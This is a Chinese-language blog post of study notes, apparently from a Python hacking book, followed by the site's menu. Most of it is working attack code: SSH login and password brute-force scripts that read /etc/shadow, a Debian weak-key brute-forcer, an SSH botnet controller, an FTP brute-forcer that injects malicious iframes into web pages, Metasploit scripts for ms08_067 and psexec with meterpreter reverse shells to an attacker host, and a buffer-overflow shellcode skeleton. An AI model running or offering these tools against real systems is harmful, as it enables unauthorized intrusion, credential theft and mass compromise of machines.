Morris 蠕虫有三种攻击方式，其中之一就是用常见的用户名和密码尝试登录 RSH 服务（remote shell）。RSH 是 1988 年问世的，它为系统管理员提供了一种很棒的远程连接一台机器，并能在主机上运行一系列终端命令对它进行管理的办法。

后来人们在 RSH 中增加一个公钥加密算法，以保护其经过网络传递的数据，这就是 SSH（Secure Shell）协议，最终 SSH 取代了 RSH。

SSH 蠕虫已经被证明是非常成功的和常见的攻击方式

用 Pexpect 与 SSH 交互

为了能完成控制台交互过程，需要用 Pexpect 模块实现与程序交互、等待预期的屏幕输出等。

以下实现 connect() 函数，该函数接收用户名、主机名和密码，返回此 SSH 连接的结果。

一旦通过验证，就可以使用一个单独的 command() 函数在 SSH 会话中发送命令。

【PS】下面这个在 macOSX 上就没跑通过，相关问题链接

import pexpect

PROMPT = ["# ", ">>> ", "> ", "\$ "]

def send_command(child, cmd):
    child.sendline(cmd)
    child.expect(PROMPT)
    print(child.before)

def connect(user, host, password):
    ssh_new_key = "Are you sure you want to continue connecting\n"
    conn_str = "ssh {}@{}\n".format(user, host)
    child = pexpect.spawn(conn_str)
    ret = child.expect([pexpect.TIMEOUT, ssh_new_key, "{}@{}'s password:".format(user, host)])

    if ret == 0:
        print("[-] Error Connecting")
        exit(-1)
    elif ret == 1:
        child.sendline("yes")
        ret = child.expect([pexpect.TIMEOUT, "[P|p]assword:"])
        if ret == 0:
            print("[-] Error Connecting")
            exit(-1)
        child.sendline(password)
        child.expect(PROMPT)
        return child
    else:
        print(child)
    exit(-1)

if __name__ == "__main__":
    child = connect("root", "192.168.158.157", "toor")
    send_command(child, "cat /etc/shadow | grep root")

用 Pxssh 暴力破解 ssh 密码

Pxssh 导入方式：import pexpect.pxssh

Pxssh 是一个包含了 pexpect 库的专用脚本，它能用预先写好的 login()、logout() 和 prompt() 等函数直接与 SSH 进行交互。

【PS】以下仅实现了连接功能，但是依旧连接不上，问题同上。

import pexpect.pxssh as pxssh
import traceback

def send_command(s, cmd):
    s.sendline(cmd)
    s.prompt()
    print(s.before)

def connect(host, user, password):
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        return s
    except Exception as e:
        traceback.print_exc()
        print("[-] Error Connecting")
        exit(-1)

if __name__ == "__main__":
    ssh = connect("localhost", "root", "Lin982674")
    send_command(ssh, "cat /etc/shadow | grep root")

接下来稍微修改下 connect() 函数即可实现爆破。如果异常显示 socket 为 read_nonblocking，可能是 SSH 服务器被大量的连接刷爆了；如果该异常显示 pxssh 命令提示符提取困难，可以等一会再试。这里实现的 connect() 可以递归地调用另一个 connect() 函数，所以必须让只有不是由 connect() 递归调用的 connect() 函数才能够释放 connection_lock 信号，书中给的最终脚本如下：

import pexpect.pxssh as pxssh
import optparse
import time
import threading

max_connections = 5
connection_lock = threading.BoundedSemaphore(value=max_connections)
found = False
fails = 0

def connect(host, user, password, release):
    global found, fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print("[+] Password Found: {}".format(password))
        found = True
    except Exception as e:
        if "read_nonblocking" in str(e):
            fails += 1
            time.sleep(5)
            connect(host, user, password, False)
        elif "synchronize with original prompt" in str(e):
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        if release:
            connection_lock.release()

def main():
    parser = optparse.OptionParser("usage %prog -H  -u  -F ")
    parser.add_option("-H", dest="target_host", type=str, help="specifiy target host")
    parser.add_option("-F", dest="password_file", type=str, help="specifiy password file")
    parser.add_option("-u", dest="user", type=str, help="specifiy the user")

    options, args = parser.parse_args()
    target_host = options.target_host
    password_file = options.password_file
    user = options.user

    if target_host is None or password_file is None or user is None:
        print(parser.usage)
        exit(-1)

    with open(password_file, "r") as f:
        for line in f.readlines():
            if found:
                print("[*] Exiing: Password Found")
                exit(0)
            if fails > 5:
                print("[!] Exiting: Too Many Socket Timeouts")
                exit(-1)
            connection_lock.acquire()
            password = line.strip("\r\n")
            print("[-] Testing: {}".format(password))
            t = threading.Thread(target=connect, args=(host, user, password, True))
            child = t.start()

if __name__ == "__main__":
    main()

iPhone 设备上 root 用户的默认密码为：alpine，当设备越狱后，用户会在 iPhone 上启用一个 OpenSSH 服务

利用 SSH 中的弱私钥

对于 SSH 服务器，密码验证并不是唯一的手段。除此之外，SSH 还能使用公钥加密的方式进行验证。在使用这一验证方法时，服务器和用户分别掌握公钥和私钥。使用 RSA 或是 RSA 算法，服务器能生成用于 SSH 登录的密钥。

不过，2006 年 Debian Linux 发行版中发生了一件有意思的事。软件自动分析工具发现了一行已被开发人员注释掉的代码。这行被注释掉的代码用来确保创建 SSH 密钥的信息量足够大。被注释掉之后，密钥空间的大小的熵值降低到只有 15 位大小。此时可能的密钥只有 32767 个。Rapid7 的 CSO 和 HD Moore 在两个小时内生成了所有的 1024 位和 2048 位算法的可能的密钥。而且，把结果放在了网上中，大家都可以下载使用。

由此可以进行暴力破解，在使用密钥登录 SSH 时，需要键入 ssh user@host -i keyfile -o PasswordAuthentication=no 格式的一条命令。DEMO 代码如下：

import pexpect
import optparse
import os
import threading

max_connections = 5
connection_lock = threading.BoundedSemaphore(value=max_connections)
stop = False
fails = 0

def connect(user, host, key_file, release):
    global stop, fails
    try:
        perm_denied = "Permission denied"
        ssh_new_key = "Are you sure you want to continue"
        conn_closed = "Connection closed by remote host"

        opt = " -o PasswordAuthentication=no"
        conn_str = "ssh {}@{} -i {}{}".format(user, host, key_file, opt)
        child = pexpect.spawn(conn_str)
        ret = child.expect([pexpect.TIMEOUT, perm_denied, ssh_new_key, conn_closed, "$", "#", ])
        if ret == 2:
            print("[-] Adding Host to !/.ssh/known_hosts")
            child.sendline("yes")
            connect(user, host, key_file, False)
        elif ret == 3:
            print("[-] Connection Closed By Remote Host")
            fails += 1
        elif ret > 3:
            print("[+] Success. {}".format(key_file))
            stop = True
    finally:
        if release:
            connection_lock.release()

def main():
    parser = optparse.OptionParser("usage %prog -H  -u  -d ")
    parser.add_option("-H", dest="target_host", type=str, help="specify target host")
    parser.add_option("-d", dest="pass_dir", type=str, help="specify directory with keys")
    parser.add_option("-u", dest="user", type=str, help="specify the user")

    options, args = parser.parse_args()
    target_host = options.target_host
    pass_dir = options.pass_dir
    user = options.user

    if target_host is None or pass_dir is None or user is None:
        print(parser.usage)
        exit(-1)

    for file_name in os.listdir(pass_dir):
        if stop:
            print("[*] Exiting: Key Found.")
            exit(0)
        if fails > 5:
            print("[!] Exiting: Too Many Connections Closed By Remote Host.")
            print("[!] Adjust number of simultaneous threads.")
            exit(0)
        connection_lock.acquire()

        full_path = os.path.join(pass_dir, file_name)
        print("[-] Testing keyfile {}".format(full_path))
        t = threading.Thread(target=connect, args=(user, target_host, full_path, True))
        child = t.start()

if __name__ == "__main__":
    main()

构建 SSH 僵尸网络

每个单独的僵尸或者 client 都需要有能连上某台肉机，并把命令发送给肉机的能力

import optparse
import pexpect.pxssh as pxssh

bot_net = list()

class Client:
    def __init__(self, host, user, password):
        self.host = host
        self.user = user
        self.password = password
        self.session = self.connect()

    def connect(self):
        try:
            s = pxssh.pxssh()
            s.login(self.host, self.user, self.password)
            return s
        except Exception as e:
            print(e)
            print("[-] Error Connecting")

    def send_command(self, cmd):
        self.session.sendline(cmd)
        self.session.prompt()
        return self.session.before

def bot_net_command(command):
    for client in bot_net:
        output = client.send_command(command)
        print("[*] Output from {}".format(client.host))
        print("[+] {}".format(output))

def add_client(host, user, password):
    client = Client(host, user, password)
    bot_net.append(client)

if __name__ == "__main__":
    add_client("10.10.10.110", "root", "toor")
    add_client("10.10.10.120", "root", "toor")
    add_client("10.10.10.130", "root", "toor")
    bot_net_command("uname -v")
    bot_net_command("cat /etc/issue")

利用 FTP 与 Web 批量抓 “肉机”

用 Python 构建匿名 FTP 扫描器

可以利用 Python 中的 ftplib 库编写一个小脚本，确定一个服务器是否允许匿名登录

import ftplib
def anon_login(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login("anonymous", "me@your.com")
        print("[*] {} FTP Anonymous Logon Succeeded.".format(host))
        ftp.quit()
        return True
    except Exception as e:
        print("[-] {} FTP Anonymous Logon Failed.".format(host))
        return False


if __name__ == "__main__":
    host = "192.168.158.161"
    anon_login(host)

使用 Ftplib 暴力破解 FTP 用户口令

FileZilla 之类的 FTP 客户端程序往往将密码以明文形式存储在配置文件中

只要将上面的 ftp.login() 替换上对应的用户名和密码就可以验证了

在 FTP 服务器上搜索网页

使用 nlst 函数，这会列出目录中所有文件的命令

dir_list = ftp.nlst()

在网页中加入恶意注入代码

直接使用 metasploit 框架生成：

msfcli exploit/windows/browser/ms10_002_aurora

上传的命令：

ftp.storlines("STOR {}".format(page), open("{}.tmp".format(page)))

完整的代码 DEMO

虽然很多余，但还是把整个流程打一遍吧

import ftplib
import optparse
import time

def anon_login(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login("anonymous", "me@your.com")
        print("[*] {} FTP Anonymous Logon Succeeded.".format(hostname))
        ftp.quit()
        return True
    except Exception as e:
        print("[-] {} FTP Anonymous Logon Failed.".format(hostname))
        return False

def brute_login(hostname, password_file):
    pf = open(password_file, "r")
    for line in pf.readlines():
        time.sleep(1)
        user_name = line.split(":")[0]
        password = line.split(":")[1].strip("\r\n")
        print("[+] Trying: {}/{}".format(user_name, password))

        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(user_name, password)
            print("[*] {} FTP Logon Succeeded: {}/{}".format(hostname, user_name, password))
            ftp.quit()
            return user_name, password
        except Exception as e:
            pass
    print("[-] Could not brute force FTP credentials.")
    return None, None

def return_default(ftp):
    dir_list = list()
    try:
        dir_list = ftp.nlst()
    except:
        print("[-] Could not list directory contents.")
        print("[-] Skipping To Next Target.")
        return dir_list

    ret_list = list()
    for file_name in dir_list:
        fn = file_name.lower()
        if ".php" in fn or ".htm" in fn or ".asp" in fn:
            print("[+] Found default page: {}".format(file_name))
        ret_list.append(file_name)

    return ret_list

def inject_page(ftp, page, redirect):
    f = open("{}.tmp".format(page), "w")
    ftp.retrlines("RETR {}".format(page), f.write)
    print("[+] Downloaded Page: {}".format(page))
    f.write(redirect)
    f.close()

    print("[+] Injected Malicious IFrame on: {}".format(page))
    ftp.storlines("STOR {}".format(page), open("{}.tmp".format(page)))
    print("[+] Uploaded Injected Page: {}".format(page))

def attack(username, password, target_host, redirect):
    ftp = ftplib.FTP(target_host)
    ftp.login(username, password)
    def_pages = return_default(ftp)
    for def_page in def_pages:
        inject_page(ftp, def_page, redirect)

def main():
    parser = optparse.OptionParser("usage%prog -H  -r [-f ]")

    parser.add_option("-H", dest="target_hosts", type=str, help="specify target host")
    parser.add_option("-f", dest="password_file", type=str, help="specify user/password file")
    parser.add_option("-r", dest="redirect", type=str, help="specify a redirection page")

    options, args = parser.parse_args()
    target_hosts = str(options.target_hosts).split(", ")
    password_file = options.password_file
    redirect = options.redirect

    if target_hosts is None or redirect is None:
        print(parser.usage)
        exit(-1)

    for target_host in target_hosts:
        username, password = None, None
        if anon_login(target_host):
            username, password = "test", "test"
            print("[+] Using Anonymous Creds to attack")
            attack(username, password, target_host, redirect)
        elif password_file is not None:
            username, password = brute_login(target_host, password_file)
            if password is not None:
                print("[+] Using Creds: {}/{} to attack".format(username, password))
                attack(username, password, target_host, redirect)

if __name__ == "__main__":
    main()

Conficker，为什么努力做就够了

蠕虫病毒，Conficker（或称为 W32DownandUp），在其基本的感染方法中，Conficker 蠕虫使用了两种不同的攻击方法。首先利用了 Windows 服务器中一个服务的 0Day 漏洞。利用这个栈溢出漏洞，蠕虫能在被感染的主机上执行 ShellCode 并下载蠕虫。当这种攻击失败时，Conficker 蠕虫又尝试暴力破解默认的管理员网络共享（ADMIN$）的口令以获取肉机访问权。

使用 Metasploit 攻击 Windows SMB 服务

虽然攻击者可以通过交互驱动的方式使用 Metasploit，但 Metasploit 也能读取批处理脚本（rc）完成攻击。在攻击时，Metasploit 会顺序执行批处理文件中的命令。

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.37
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.77.77
set LPORT 7777
exploit -j -z

msfconsole -r conficker.rc
> sessions -i 1
> execute -i -f cmd.exe

编写 Python 脚本与 Metasploit 交互

首先需要扫描网段内所有开放 445 端口的主机，TCP 445 端口主要是作为 SMB 协议的默认端口用的

import nmap
def find_target(sub_net):
    nm_scan = nmap.PortScanner()
    nm_scan.scan(sub_net, "445")
    target_hosts = list()
    for host in nm_scan.all_hosts():
        if nm_scan[host].has_tcp(445):
            state = nm_scan[host]["tcp"][445]["state"]
            if state == "open":
                print("[+] Found Target Host: {}".format(host))
	return target_hosts

接下来需要编写一个监听器，这个监听器或称命令与控制信道，用于与目标主机进行远程交互

Metasploit 提供了一个 Meterpreter 的高级动态负载，当 Meterpreter 进程回连接到攻击者的计算机等候执行进一步的命令时，要使用一个名为 multi/handler 的 Metasploit 模块去发布命令。接下来需要把各条指令写入 Metasploit 的 rc 脚本中

def setup_handler(config_file, lhost, lport):
    config_file.write("use exploit/multi/handler\n")
    config_file.write("set PAYLOAD windows/meterpreter/reverse_tcp\n")
    config_file.write("set LPORT {}\n".format(lport))
    config_file.write("set LHOST {}\n".format(lhost))
    config_file.write("exploit -j -z\n")
    config_file.write("setg DisablePayloadHandler 1\n")

注意脚本发送了一条指令：在同一个任务（job）的上下文环境中（-j），不与任务进行即时交互的条件下（-z）利用目标计算机上的漏洞

def conficker_exploit(config_file, target_host, lhost, lport):
    config_file.write("use exploit/windows/smb/ms08_067_netapi\n")
    config_file.write("set RHOST {}\n".format(target_host))
    config_file.write("set PAYLOAD windows/meterpreter/reverse_tcp\n")
    config_file.write("set LPORT {}\n".format(lport))
    config_file.write("set LHOST {}\n".format(lhost))
    config_file.write("exploit -j -z\n")

暴力破解口令，远程执行一个进程

需要用暴力攻击的方式破解 SMB 用户名/密码，以此获取权限在目标主机上远程执行一个进程（psexec）

def smb_brute(config_file, target_host, passwd_file, lhost, lport):
    username = "Administrator"
    pf = open(passwd_file, "r")
    for password in pf.readlines():
        password = password.strip("\r\n")
        config_file.write("use exploit/windows/smb/psexec\n")
        config_file.write("set SMBUser {}\n".format(username))
        config_file.write("set SMBPass {}\n".format(password))
        config_file.write("set RHOST {}\n")
        config_file.write("set PAYLOAD windows/meterpreter/reverse_tcp\n")
        config_file.write("set LPORT {}\n".format(lport))
        config_file.write("set LHOST {}\n".format(lhost))
        config_file.write("exploit -j -z\n")

整合

最主要的是 main 函数如何与 metasploit 交互，发现是通过 rc 文件

config_file = open("meta.rc", "w")
...
os.system("msfconsole -r meta.rc")

编写你自己的 0day 概念验证代码

Morris 蠕虫成功的原因在某种程度上其实就是利用了 Finger service 中的一个基于栈的缓冲区溢出

基于栈的缓冲区溢出攻击

shellcode = ("\xbf\x5c....")
overflow = "\x41" * 246
ret = struct.pack(", 0x7c874413)
padding = "\x90" * 150
crash = overflow + ret + padding + shellcode

发送漏洞利用代码

使用 Berkeley Socket API 发送，其实就是套接字发送，之前在学校课程已经接触过了，不记录了

LI’s personal homepage

Build Large Language Model

阅读图书Build Large Language Model

开始

第2章 Working with Text Data

第3章 Coding Attention Mechanisms

第4章Implementing a GPT model from Scratch To Generate Text

第5章 Pretraining on Unlabeled Data

Evaluating generative text models

训练模型

Temperature Scaling

1. 背景：模型校准问题

2. 温度缩放的原理

温度参数 ( T ) 的作用：

3. 温度缩放的实现

代码示例：

输出结果：

4. 如何选择温度参数 ( T )

代码示例：

5. 温度缩放的应用场景

6. 温度缩放的优缺点

优点：

缺点：

总结

Top-k Sampling

1. 背景：文本生成中的采样问题

2. Top-k 采样的原理

数学公式：

3. Top-k 采样的实现

示例：

4. Top-k 采样的优点

5. Top-k 采样的缺点

6. Top-k 采样的改进：Top-p（Nucleus）采样

7. Top-k 采样的应用场景

8. 总结

加载模型Loading pretrained weights from OpenAI

总结

1. 文本生成过程

2. 训练与验证

3. 预训练

总结

Attention mechanism

PyTorch 注意力模型实现详解（以简单的机器翻译为例）

知识背景

总结

Using Python to implement anti-killing

用 Python 实现免杀

免杀的过程

免杀验证

Probing the Network with Python

用 Python 刺探网络

使用 Mechanize 库上网

匿名性——使用代理服务器、User-Agent 及 Cookie

把代码集成在 Python 类的 AnonBrowser 中

用 AnonBrowser 抓取更多的 Web 页面

用 Beautiful Soup 解析 href 链接

用 BeautifulSoup 映射图像

研究、调查、发现

用 Python 与谷歌 API 交互

用 Python 解析 Tweets 个人主页

从推文中提取地理位置信息

用正则表达式解析 Twitter 用户的兴趣爱好

匿名电子邮件

批量社工

使用 smtplib 给目标对象发邮件

用 smtplib 进行网络钓鱼

Wireless Network Attacks Using Python

用 Python 进行无线网络攻击

搭建无线网络攻击环境

用 Scapy 测试无线网卡的嗅探功能

安装 Python 蓝牙包

绵羊墙-被动窃听无线网络中传输的秘密

使用 Python 正则表达式嗅探信用卡信息

嗅探宾馆住客

编写谷歌键盘记录器

嗅探 FTP 登陆口令

你带着笔记本电脑去过哪里？Python 告诉你

侦听 802.11 Probe 请求

寻找隐藏的 802.11 信标

找出隐藏的 802.11 网络的网络名

“风暴”（Storm）的 fast-flux 和 Conficker 的 domain-flux

用 Scapy 找出 `fast-flux` 流量